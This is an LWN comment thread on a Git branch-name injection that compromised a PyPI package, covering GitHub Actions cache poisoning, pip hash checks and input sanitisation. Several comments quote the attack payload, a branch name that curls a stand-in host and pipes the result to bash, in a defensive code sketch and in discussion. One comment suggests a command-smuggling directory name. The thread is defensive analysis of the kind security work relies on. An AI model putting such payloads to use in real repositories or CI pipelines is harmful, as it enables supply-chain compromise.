LWN: Comments on "Abusing Git branch names to compromise a PyPI package" https://lwn.net/Articles/1001215/ This is a special feed containing comments posted to the individual LWN article titled "Abusing Git branch names to compromise a PyPI package". en-us Mon, 03 Nov 2025 22:19:38 +0000 Mon, 03 Nov 2025 22:19:38 +0000 https://www.rssboard.org/rss-specification lwn@lwn.net Microsoft had a good idea https://lwn.net/Articles/1001823/ https://lwn.net/Articles/1001823/ mgedmin <div class="FormattedComment"> <span class="QuotedText">&gt; Now I'm wondering if any of the desktop oriented Linux distros considered making this change, with a compat symlink for /home.</span><br> <p> GoboLinux, which I've never tried personally. I don't think it has any compatibility symlinks, just a directory tree with /Programs, /Users, etc.<br> </div> Thu, 12 Dec 2024 09:47:47 +0000 Microsoft had a good idea https://lwn.net/Articles/1001764/ https://lwn.net/Articles/1001764/ jezuch <div class="FormattedComment"> So.... Windows fixed this and then they pulled the Unix stuff and had to accommodate all the broken stuff in it?<br> <p> Oh the irony!<br> </div> Wed, 11 Dec 2024 16:59:15 +0000 Microsoft had a good idea https://lwn.net/Articles/1001554/ https://lwn.net/Articles/1001554/ Wol <div class="FormattedComment"> Made even worse because on Pr1mos dot-extensions were a (new) convention at the time, while on Windows they are (almost) mandatory.<br> <p> So with most of the * files being extensionless, the globbing really went mad (I think it actually went recursive!), and until we realised and put a bug in against the backup software, it caused us quite a bit of grief. Telling "our" software not to use *'s was not an option ...<br> <p> Cheers,<br> Wol<br> </div> Tue, 10 Dec 2024 12:40:04 +0000 Microsoft had a good idea https://lwn.net/Articles/1001550/ https://lwn.net/Articles/1001550/ taladar <div class="FormattedComment"> That must have been particularly bad on Windows since Windows programs implement globbing themselves instead of letting a shell do it.<br> </div> Tue, 10 Dec 2024 11:22:11 +0000 The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight. https://lwn.net/Articles/1001543/ https://lwn.net/Articles/1001543/ jthill I see you're correct. Yow. That's painful. I've probably made this mistake myself then. <p> Unless I'm still blindspotting, <code>$branchname</code> expanded, quoted or not, still won't be expanded again unless rescanned, like the expansion being passed to bash -c or something instead of the var being passed in the environment for the invoked bash to expand just the once itself. Tue, 10 Dec 2024 09:24:59 +0000 Microsoft had a good idea https://lwn.net/Articles/1001539/ https://lwn.net/Articles/1001539/ Wol <div class="FormattedComment"> We had a system that used "*" as a matter of course in (Windows) file names. It was originally from a completely different OS (Pr1mos, of course, which used @ and = as wildcards), so they just ported it and didn't think about the implications ...<br> <p> The number of programs (backup especially) that tried to glob the filename and then broke spectacularly ...<br> <p> Cheers,<br> Wol<br> </div> Tue, 10 Dec 2024 08:12:16 +0000 The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight. https://lwn.net/Articles/1001535/ https://lwn.net/Articles/1001535/ excors <div class="FormattedComment"> I think that's not correct. 
The only part of &lt;that mess&gt; check-ref-format objects to is the ":", but that's not actually part of the branch name. The GitHub pull request is displaying "repositoryname:branchname", and the branch name passed into ${{github.ref}} will be "refs/heads/$({curl,...)" which check-ref-format accepts.<br> <p> (check-ref-format does reject spaces, which is presumably why the branch name uses ${IFS} instead. It also rejects ASCII control characters, '~', '^', '?', '*', '[', '..', '//', '@{', '\', etc, and says "These rules make it easy for shell script based tools to parse reference names, pathname expansion by the shell when a reference name is used unquoted (by mistake), and also avoid ambiguities in certain reference name expressions" [I think it meant to say "*avoid* pathname expansion"?]. But if it's meant to be safe when mistakenly used unquoted, why does it still allow '$'?)<br> </div> Tue, 10 Dec 2024 07:54:54 +0000 The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight. https://lwn.net/Articles/1001532/ https://lwn.net/Articles/1001532/ jthill <code><pre> branchname='&lt;that mess&gt;' git check-ref-format refs/heads/"$branchname" || die no that does not look good </pre></code> Tue, 10 Dec 2024 01:19:49 +0000 Microsoft had a good idea https://lwn.net/Articles/1001527/ https://lwn.net/Articles/1001527/ bearstech <div class="FormattedComment"> I once used "&amp;" in a folder name. It broke so many things, it was scary, I gave up with the name.<br> </div> Mon, 09 Dec 2024 21:47:29 +0000 Microsoft had a good idea https://lwn.net/Articles/1001503/ https://lwn.net/Articles/1001503/ Cyberax <div class="FormattedComment"> <span class="QuotedText">&gt; neither have a problem with longer filenames with spaces.</span><br> <p> Try setting your $HOME to a path with spaces, and watch the errors roll in as all kinds of scripts start breaking. GUI utils typically work fine, but anything with the shell scripts just cracks.<br> </div> Mon, 09 Dec 2024 18:33:38 +0000 Microsoft had a good idea https://lwn.net/Articles/1001493/ https://lwn.net/Articles/1001493/ raven667 <div class="FormattedComment"> This is the likely technical reason, but it's also nice to bring the structure into alignment with MacOSX and use a friendly to read name with capitalization, making the one small detail of where user-managed files are platform agnostic `/Users/$username/Documents` everywhere. Now I'm wondering if any of the desktop oriented Linux distros considered making this change, with a compat symlink for /home.<br> </div> Mon, 09 Dec 2024 16:54:38 +0000 How to fix the whole category of shell injection https://lwn.net/Articles/1001370/ https://lwn.net/Articles/1001370/ farnz Taint is well-defined, and doesn't mean "unsafe to use"; it means that the data came from an untrusted source, and has not yet been either validated for safety, or parsed into a trusted format. <p>The idea is that you have a "taint removal" layer that carefully handles potentially dangerous data, and converts it to a safe form or an error; most of your code doesn't go near the dangerous data, and the code that does can be carefully audited for correctness. Then, any injection bugs must either be in the "taint removal" layer, or in the layer that turns "safe" internal data into external data. 
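<p>As a purely illustrative sketch of that layering in Python (the function names and the allowlist regex are made up for the example; they are not anyone's real API, and the allowlist is deliberately not git's actual rule set):
<code><pre>
import re
import subprocess

# Illustrative allowlist for branch names: anything that does not match is
# rejected rather than "cleaned up". (An assumed, conservative rule set for
# this sketch only; it is not git's check-ref-format rules.)
_SAFE_BRANCH = re.compile(r"[A-Za-z0-9._/-]{1,100}")

def parse_branch_name(untrusted):
    """Taint-removal step: turn untrusted input into validated data, or fail."""
    if not _SAFE_BRANCH.fullmatch(untrusted):
        raise ValueError("rejecting suspicious branch name: %r" % untrusted)
    return untrusted

def checkout(untrusted_branch):
    branch = parse_branch_name(untrusted_branch)   # only validated data past this point
    subprocess.run(["git", "checkout", branch], check=True)   # argv list, no shell involved
</pre></code>
<p>The exact regex is beside the point; what matters is that everything past the parse step only ever sees values that have already been through it, and the one dangerous spot stays small enough to audit.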
<p>And note that this is a natural pattern in languages with strict type systems; you have parsers that take input and turn it into internal structures, then you do your work on the internal structures, and you convert back from internal to external structures as you interact with other programs. Mon, 09 Dec 2024 11:15:47 +0000 How to fix the whole category of shell injection https://lwn.net/Articles/1001369/ https://lwn.net/Articles/1001369/ taladar <div class="FormattedComment"> As far as I recall Ruby had that originally too; I'm not sure if it is still around.<br> <p> The main problem I see with a general taint flag on input is that tainted data is really not well defined. Data could be e.g. perfectly fine for use in a shell script but cause an injection in SQL or HTML.<br> </div> Mon, 09 Dec 2024 10:46:42 +0000 Bash Replacement - Rust Scripts https://lwn.net/Articles/1001368/ https://lwn.net/Articles/1001368/ taladar <div class="FormattedComment"> Terseness has advantages in interactive use, but in scripts it really isn't necessary, especially if you are just talking about the same number of tokens spread over more lines.<br> </div> Mon, 09 Dec 2024 10:44:54 +0000 Microsoft had a good idea https://lwn.net/Articles/1001367/ https://lwn.net/Articles/1001367/ leromarinvit <div class="FormattedComment"> Can't be the reason. They renamed it in Vista IIRC (certainly no later than Windows 7), long before WSL.<br> </div> Mon, 09 Dec 2024 10:26:12 +0000 Microsoft had a good idea https://lwn.net/Articles/1001366/ https://lwn.net/Articles/1001366/ excors <div class="FormattedComment"> It changed in Vista, when many APIs were still limited to a MAX_PATH of 260 bytes. I can't find any official explanations, but there are plausible claims that the renaming from "C:\Documents and Settings\foo\Application Data\..." to "C:\Users\foo\AppData\..." was specifically to shorten paths and allow applications to have more deeply nested folder structures.<br> </div> Mon, 09 Dec 2024 10:24:44 +0000 Microsoft had a good idea https://lwn.net/Articles/1001361/ https://lwn.net/Articles/1001361/ zdzichu <div class="FormattedComment"> Could you expand a little? WSL is either a Linux API implementation (WSL 1) or Linux itself (WSL 2); neither has a problem with longer filenames with spaces.<br> </div> Mon, 09 Dec 2024 09:06:20 +0000 Microsoft had a good idea https://lwn.net/Articles/1001359/ https://lwn.net/Articles/1001359/ Cyberax <div class="FormattedComment"> WSL (10 characters)<br> </div> Mon, 09 Dec 2024 08:00:30 +0000 Microsoft had a good idea https://lwn.net/Articles/1001358/ https://lwn.net/Articles/1001358/ lkundrak <div class="FormattedComment"> I think they renamed it to "C:\Users" in more recent versions, and "Documents and Settings" is merely a symlink/junction (or the other way around?). 
Wondering why.<br> </div> Mon, 09 Dec 2024 06:09:13 +0000 Usernames https://lwn.net/Articles/1001355/ https://lwn.net/Articles/1001355/ randomguy3 <div class="FormattedComment"> To be clear: the builds broke because in this situation, pip doesn't attempt to fix the cache, but instead errors out (which isn't an unreasonable action from a security standpoint).<br> </div> Sun, 08 Dec 2024 23:33:33 +0000 Usernames https://lwn.net/Articles/1001354/ https://lwn.net/Articles/1001354/ randomguy3 <div class="FormattedComment"> If pip is looking in the cache to satisfy a request for a wheel it would otherwise have downloaded, it will indeed verify that the hash of the local wheel matches the server-reported hash of the file it would have downloaded.<br> <p> I've occasionally run into this when some badly-behaved project overwrote a wheel (on a company-internal server) and all the builds that had existing caches broke!<br> </div> Sun, 08 Dec 2024 23:31:30 +0000 Usernames https://lwn.net/Articles/1001353/ https://lwn.net/Articles/1001353/ meejah <div class="FormattedComment"> pip can be told to verify the hashes of the wheels it downloads. This isn't necessarily "hard" per se, but is an extra step so many projects don't bother shipping such hash requirements.<br> <p> That is, an end-user application can ship a "requirements.txt" file that contains hashes for all possible wheels for all exact versions of every requirement, and then pass `--require-hashes`. One problem is that it's "all possible wheels at some point in time" and authors may upload previously-non-existent wheels later.<br> <p> I don't believe there's any way to declare your dependencies with hashes (e.g. a Python library or application can say "I depend on foo == 1.2.3" but cannot specify the hashes -- and yes, there are usually many because wheels are architecture / platform specific).<br> </div> Sun, 08 Dec 2024 22:51:37 +0000 Microsoft had a good idea https://lwn.net/Articles/1001352/ https://lwn.net/Articles/1001352/ eru <div class="FormattedComment"> Windows has its own super-weird filename restrictions. You cannot use a device name as a pathname component, and this even includes names with a dot and a suffix. Sometimes trips you up when copying files from other operating systems, where something like "aux.c" is a perfectly reasonable name.<br> </div> Sun, 08 Dec 2024 19:52:16 +0000 Usernames https://lwn.net/Articles/1001342/ https://lwn.net/Articles/1001342/ mathstuf <div class="FormattedComment"> Hopefully clarifications (and any relevant improvements) can come from trailofbits and others working on the PyPI security story.<br> </div> Sun, 08 Dec 2024 14:02:17 +0000 Microsoft had a good idea https://lwn.net/Articles/1001339/ https://lwn.net/Articles/1001339/ cbcbcb <div class="FormattedComment"> You can... you just need a couple of nested directories to do it :)<br> <p> </div> Sun, 08 Dec 2024 13:33:26 +0000 Microsoft had a good idea https://lwn.net/Articles/1001338/ https://lwn.net/Articles/1001338/ mb <div class="FormattedComment"> I get the idea and I generally agree. But file names can't have / or NUL in them. :)<br> <p> </div> Sun, 08 Dec 2024 13:14:05 +0000 Microsoft had a good idea https://lwn.net/Articles/1001337/ https://lwn.net/Articles/1001337/ cbcbcb <div class="FormattedComment"> Microsoft had a good idea when they invented the "C:\Documents and Settings" directory. 
It meant that all Windows software routinely encountered filenames with spaces, and it had to be fixed.<br> <p> It would be rather inconvenient to rename “/home“ as “/home$(touch /tmp/security_bug)“, but I bet you'd still find a lot of broken filename handling if you did<br> <p> </div> Sun, 08 Dec 2024 12:48:47 +0000 Usernames https://lwn.net/Articles/1001336/ https://lwn.net/Articles/1001336/ excors <div class="FormattedComment"> <span class="QuotedText">&gt; Is `pip` missing hash verification somewhere?</span><br> <p> This is getting far beyond my ability to research it with even a little bit of confidence, so you definitely shouldn't trust what I'm saying. But I get the impression that the GitHub Actions pip cache works by caching ~/.cache/pip, which includes both downloaded files and locally-built wheels (to save the cost of rebuilding packages before installing). There's no way to verify the integrity of those wheels, so an attacker tampering with them will cause trouble.<br> <p> (The download cache may not be very secure either: "By default, pip does not perform any checks to protect against remote tampering and involves running arbitrary code from distributions" (<a href="https://pip.pypa.io/en/stable/topics/secure-installs/">https://pip.pypa.io/en/stable/topics/secure-installs/</a>). It checks the (optional) hashes provided by index servers as "a protection against download corruption", not for security. You can improve that by specifying hashes in the local requirements.txt, though I don't know if verification happens before or after the cache.)<br> </div> Sun, 08 Dec 2024 10:25:01 +0000 Cache poisoning in CI https://lwn.net/Articles/1001332/ https://lwn.net/Articles/1001332/ mathstuf <div class="FormattedComment"> Even with the cache, we still update the index on every pipeline, so one would need to intercept that. I suppose one could put bad things into the cache with a dedicated MR, but I'm not sure how one would make `master` use it blindly as it is set up to still ask `crates.io`. I suppose it hinges on whether already-downloaded things are actually re-verified or not when using them. Something to test…<br> <p> <span class="QuotedText">&gt; If you also cache the current working directory, which is a reasonable thing to want to do to speed up build times in a project with a bunch of third-party dependencies, then I believe cache poisoning is pretty easy.</span><br> <p> Yeah, that seems a lot easier to target. For compilation, we use `sccache`. Not only does this get us cache hits across crates, but it also means we're not limited to storing only "the last version built" in the cache.<br> </div> Sun, 08 Dec 2024 07:35:31 +0000 Cache poisoning in CI https://lwn.net/Articles/1001328/ https://lwn.net/Articles/1001328/ geofft <div class="FormattedComment"> cargo, I believe, caches source code globally (user-wide) and build artifacts per project, including build artifacts for dependencies. Source code has checksums that are attested by the registry, but build artifacts are likely going to change per environment, so I believe they do not get any hash checking. If you preserve ~/.cargo alone then cache poisoning is probably difficult (though I bet there are attacks based on poisoning things like ~/.cargo/config.toml that are strictly speaking not part of the cache). 
If you also cache the current working directory, which is a reasonable thing to want to do to speed up build times in a project with a bunch of third-party dependencies, then I believe cache poisoning is pretty easy.<br> <p> pip, on the other hand, caches build artifacts globally (user-wide), in the sense that an upstream project that only provides source code gets built into binary form (a wheel) locally by itself, and then that wheel is installed into whichever environment you're running pip on. As with the cargo situation, there's nothing to chain hash verification to for a locally-built binary artifact. But because the binary artifacts are shared, cache poisoning is indeed easy.<br> <p> I can't think of a way to solve either of these robustly - any place that you store the hash of the output is going to be as vulnerable as the output itself, no? I think the only thing you can do is to make the cache read-only when doing builds of attacker-controlled code, and only write to the cache on CI runs triggered post merge (or if the PR author is trusted). This appears to be less than straightforward with github.com/actions/cache, and I'm very much not sure if that really makes the cache read-only or if it only skips an intentional write, such that a sufficiently clever attacker-controlled script can talk to the cache API itself and do a write with the same credentials used to read the cache.<br> <p> (Also, the pip ecosystem includes the option to get binaries from the registry, and it is standard practice to provide and to use these binaries - this makes sense because Python users are generally not expected to have a working C toolchain, since they're writing an interpreted language, whereas Rust users are running a compiler anyway and need at least a linker and the libc development library/headers from a C toolchain, so Python users benefit much more than Rust users from precompiled libraries. I don't know offhand if pip is good at verifying the hash of a wheel in the cache that is attested in the registry, or if it doesn't distinguish such wheels from locally-built wheels.)<br> </div> Sun, 08 Dec 2024 04:17:00 +0000 Usernames https://lwn.net/Articles/1001327/ https://lwn.net/Articles/1001327/ geofft <div class="FormattedComment"> Oh, yeah, the rules proposed on that web page, at the very bottom, sound along the lines of what I was thinking - they do permit accented or non-Latin letters (which aren't currently allowed for usernames) and mandate UTF-8 encoding for those, but they forbid punctuation that is meaningful to the shell.<br> </div> Sun, 08 Dec 2024 03:51:11 +0000 Bash Replacement - Rust Scripts https://lwn.net/Articles/1001318/ https://lwn.net/Articles/1001318/ jengelh <div class="FormattedComment"> There are many languages which have had ambitions to replace shell scripts as a "safer" alternative. But every now and then there are features of sh that, when written in the new language, amount to more code than before.<br> <p> while read x y z; do foo "$x" | bar "$y" | baz "$z"; done &lt;file<br> <p> Now do that in Perl, Python, Lua, anything (or Rust if you insist). Whenever you need more than three lines, sh syntax "wins", as users like the terseness.<br> </div> Sat, 07 Dec 2024 23:21:03 +0000 Usernames https://lwn.net/Articles/1001317/ https://lwn.net/Articles/1001317/ mathstuf <div class="FormattedComment"> Thanks, I had missed that link. Yes, the cache poisoning angle is interesting… Probably more relevant to cloud-resident runners (we have our own fleet of runners for our GitLab instance for $VARIOUS_REASONS). 
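<p>(For concreteness, a minimal sketch of what that kind of check amounts to; this is a hypothetical illustration, not pip's or cargo's actual code path:)
<code><pre>
import hashlib

def sha256_of(path):
    """Stream a cached artifact (e.g. a wheel) and return its hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1024 * 1024), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_cached_wheel(path, pinned_sha256):
    """Use the cached file only if it matches a digest pinned in requirements.txt
    (or attested by the index); otherwise treat the cache entry as poisoned."""
    if sha256_of(path) != pinned_sha256:
        raise RuntimeError("cached wheel does not match pinned hash; refusing to install")
    return path
</pre></code>
The hard part is the one geofft points out above: for a locally-built wheel there is no trustworthy place to get pinned_sha256 from in the first place.<br>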
I know we use fleet-wide caching for Linux compilations and host-wide compiler caching for macOS and Windows. I see a few projects using caches for `cargo`, but I *believe* that `cargo` will hash verify before actually using anything from it. Is `pip` missing hash verification somewhere? Maybe we need the payload to know?<br> <p> <span class="QuotedText">&gt; (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)</span><br> <p> Ugh. "Fix formatting" commits are pretty much the epitome of useless commit noise. Useless diff, useless commit message. I've gone over that in comments here previously; I'll avoid rehashing it again.<br> <p> <span class="QuotedText">&gt; it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.</span><br> <p> Yes…I've mostly done GitLab-CI, but every time I visit GHA I am rebuffed by its (to me) unnecessary complexity.<br> </div> Sat, 07 Dec 2024 21:05:53 +0000 Additional malware versions released https://lwn.net/Articles/1001315/ https://lwn.net/Articles/1001315/ ewen <div class="FormattedComment"> It appears two further malware infected package versions were released in the last 24 hours:<br> <p> <a href="https://github.com/ultralytics/ultralytics/issues/18027#issuecomment-2525197488">https://github.com/ultralytics/ultralytics/issues/18027#i...</a><br> <p> And the current theory is those were uploaded directly to PyPI, presumably using stolen credentials (eg a PAT — personal access token), since there doesn’t seem to be a matching GitHub CI run.<br> <p> See also the summary from the repo owner:<br> <p> <a href="https://github.com/ultralytics/ultralytics/pull/18018#issuecomment-2525179403">https://github.com/ultralytics/ultralytics/pull/18018#iss...</a><br> <p> But also note some of the details are disputed by one of the security researchers who looked into it in detail yesterday (and did a large write up linked by others earlier):<br> <p> <a href="https://github.com/ultralytics/ultralytics/issues/18027#issuecomment-2525287603">https://github.com/ultralytics/ultralytics/issues/18027#i...</a><br> <p> So it appears there’ll need to be more cleanup from the attacker having got in via string interpolation issues :-/ And meanwhile a bunch of packages depending on the impacted package have locked the version to the last release before the malware infected versions and/or suggested their users check for and remove the affected versions.<br> <p> I guess we should be glad it’s “just” a crypto miner this time (which is fairly noisy / obvious due to the CPU usage).<br> <p> Ewen<br> </div> Sat, 07 Dec 2024 20:26:25 +0000 How to fix the whole catagory of shell injection https://lwn.net/Articles/1001313/ https://lwn.net/Articles/1001313/ raven667 <div class="FormattedComment"> I think that is where my half-formed thought was going, in this specific case the commands could just be an array of yaml strings and the ci could parse into an argv before applying template variable replacement. 
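<p>(A rough sketch of that idea; the step layout and the names are invented for illustration and are not any real CI system's syntax:)
<code><pre>
import subprocess

# Hypothetical CI step: the command is data (an array of argv elements),
# not a shell string, so a template value like the article's branch-name
# payload cannot smuggle in shell syntax.
step = {
    "run": ["git", "checkout", "{branch}"],                          # array of YAML strings
    "vars": {"branch": "$({curl,evil.example}${IFS}|${IFS}bash)"},   # attacker-controlled value
}

# Parse into an argv first, then substitute template values into the
# already-split elements, purely as data.
argv = [arg.format(**step["vars"]) for arg in step["run"]]
# argv == ['git', 'checkout', '$({curl,evil.example}${IFS}|${IFS}bash)']
# The payload reaches git as one literal argument; no shell ever parses it,
# so git just reports that no such branch exists.
subprocess.run(argv)
</pre></code>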
That wouldn't work when you have some if/then logic, but a shell-like DSL with a very restricted feature set could make the transition easier. Or you could build expression evaluation into the YAML alongside your template engine, similar to how Ansible has Python/Jinja `when:` expressions; there is some customization/integration to be sure, but they didn't have to invent a whole custom system, and experience with the library transfers between different tools in the same ecosystem. <br> <p> I'm just frustrated at seeing this same kind of problem again. <br> </div> Sat, 07 Dec 2024 20:15:39 +0000 Usernames https://lwn.net/Articles/1001309/ https://lwn.net/Articles/1001309/ excors <div class="FormattedComment"> <span class="QuotedText">&gt; I think the core issue is that PR pipelines had access to secrets to publish at all</span><br> <p> According to <a href="https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-injection">https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-...</a> (previously linked by nickodell), the exploited workflow didn't have permissions to publish directly, but the exploit probably used cache poisoning as a method of privilege escalation. (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)<br> <p> As detailed in <a href="https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/">https://adnanthekhan.com/2024/05/06/the-monsters-in-your-...</a> , GitHub Actions has (optional) caching support for the inputs and outputs of workflows. The cache server uses branches as the security boundary: cache entries written by a workflow in a given branch can only be read by workflows in the same branch or a descendant (pull requests, forked projects, etc). In this case, the exploited workflow is configured as pull_request_target, which is triggered by a pull request but executes in the project's main branch (unlike pull_request, which executes in the pull request's branch, I think). That means it can write arbitrary data into the main branch's cache, and any other workflows running in the main branch with caching enabled will read from that poisoned cache.<br> <p> That includes the workflow that signs and publishes artifacts to PyPI, which uses a pip cache for the standard dependencies of the publish scripts. The attacker can insert their own files into the pip cache, allowing arbitrary code execution in the publish workflow.<br> <p> The cache poisoning article recommends "Never run untrusted code within the context of the main branch if any other workflows use GitHub Actions caching", and the zizmor article says pull_request_target is "a fundamentally dangerous workflow trigger". 
GitHub's documentation doesn't go that far, but does mention cache poisoning and other dangers with pull_request_target (<a href="https://docs.github.com/en/actions/writing-workflows/choosing-when-your-workflow-runs/events-that-trigger-workflows#pull_request_target">https://docs.github.com/en/actions/writing-workflows/choo...</a>).<br> <p> It looks like Ultralytics violated multiple security best practices here - but on the other hand, it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.<br> </div> Sat, 07 Dec 2024 16:39:05 +0000 How to fix the whole catagory of shell injection https://lwn.net/Articles/1001310/ https://lwn.net/Articles/1001310/ eru <div class="FormattedComment"> Perl has this concept of tainted data, which perhaps would help.<br> </div> Sat, 07 Dec 2024 16:35:02 +0000 Bash Replacement - Rust Scripts https://lwn.net/Articles/1001307/ https://lwn.net/Articles/1001307/ smcv <div class="FormattedComment"> If you can inject arbitrary code into a template that is subsequently run as a script (as in this particular vulnerability), it doesn't really matter whether it's arbitrary shell execution, arbitrary Rust execution, or any other language like Python or Lua - arbitrary code is arbitrary code.<br> <p> Shell script makes it very hard to avoid *other* vulnerabilities, but *this* vulnerability wasn't a shell problem.<br> </div> Sat, 07 Dec 2024 15:36:53 +0000 Usernames https://lwn.net/Articles/1001305/ https://lwn.net/Articles/1001305/ mathstuf <div class="FormattedComment"> Maybe. I think the core issue is that PR pipelines had access to secrets to publish at all, not just "someone could do some crazy thing to make a workflow do something unexpected". I am not really sure how GHA secrets work, but GitLab is really simple in that I can lock secrets to:<br> <p> - protected branches<br> - jobs with a specific "environment" tag attached to them<br> <p> I think there is absolutely no reason that PR CI pipelines/workflows should have any access to *any* secrets regardless of whether they can be coaxed into doing unintended things or not.<br> </div> Sat, 07 Dec 2024 15:26:44 +0000 Usernames https://lwn.net/Articles/1001303/ https://lwn.net/Articles/1001303/ quotemstr <div class="FormattedComment"> Sure. I'd actually want to apply David Wheeler's entire sanitization program; <a href="https://dwheeler.com/essays/fixing-unix-linux-filenames.html">https://dwheeler.com/essays/fixing-unix-linux-filenames.html</a><br> <p> Banning literal terminal control codes in usernames would merely be a good start <br> </div> Sat, 07 Dec 2024 14:54:50 +0000
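<p>(To make that concrete: a minimal sketch of such a conservative check in Python. The policy here is invented for illustration and is stricter than the rules geofft describes above, which also allow non-Latin letters in UTF-8; it is not the exact rule set from the linked essay:)
<code><pre>
import re

# Assumed, illustrative policy: start with a letter; then letters, digits,
# '.', '_' or '-'; no control characters, no whitespace, nothing that is
# meaningful to the shell.
_SAFE_USERNAME = re.compile(r"[A-Za-z][A-Za-z0-9._-]{0,31}")

def is_safe_username(name):
    return bool(_SAFE_USERNAME.fullmatch(name))

assert is_safe_username("alice")
assert not is_safe_username("bob\x1b]0;pwned\x07")    # literal terminal control codes
assert not is_safe_username("eve$(touch /tmp/x)")     # shell command substitution
</pre></code>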